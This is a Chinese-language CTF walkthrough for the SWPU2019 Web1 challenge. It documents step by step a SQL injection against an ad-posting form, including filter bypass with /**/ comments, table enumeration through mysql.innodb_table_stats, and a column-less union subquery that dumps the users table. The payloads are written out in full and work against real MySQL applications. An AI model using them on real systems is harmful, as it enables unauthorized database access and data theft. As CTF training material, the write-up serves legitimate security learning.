[SWPU2019]Web1
尝试注册admin,显示已存在,爆破密码没爆出来
注册一个test账户 登陆
申请发布广告
尝试注入
使用单引号尝试,报错
说明存在注入,尝试万能密码
有过滤,尝试fuzz,但是限制了次数和不允许相同广告标题
所以只能手动测试,过滤了 or order floor updatexml # – 等,并且自动消除了空格,尝试内联注释/**/绕过
由于or被过滤,那么information_schema就无法使用,只能使用无列名注入,参考:SQL注入之无列名注入
1.使用group by获取列数:1'/**/group/**/by/**/22,'1
1'/**/group/**/by/**/23,'1
得到列数为22
2.使用联合查询查看回显点:-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
得到回显点为 2 3
接着查表名的时候发现or被过滤,且无法通过大小写和双写绕过,那么information_schema因为含有or,所以也没法使用。这里有两种方法可以绕过
InnoDb引擎
从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。
sys数据库
在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。
注:sys库需要root权限才能访问。innodb在mysql中是默认关闭的。
3.使用innodb绕过,查看表名:-1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1
得到表名为 ads users
4.使用无列名注入查看users表中的第二个字段的内容:
-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
注:这里的联合注入使用的select 1,2,3可以测试出来,如果不匹配会有提醒
测出来为3列
得到字段名为flag,那么第三个字段中第一个值就是flag
将要查询的列改为3即可
-1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1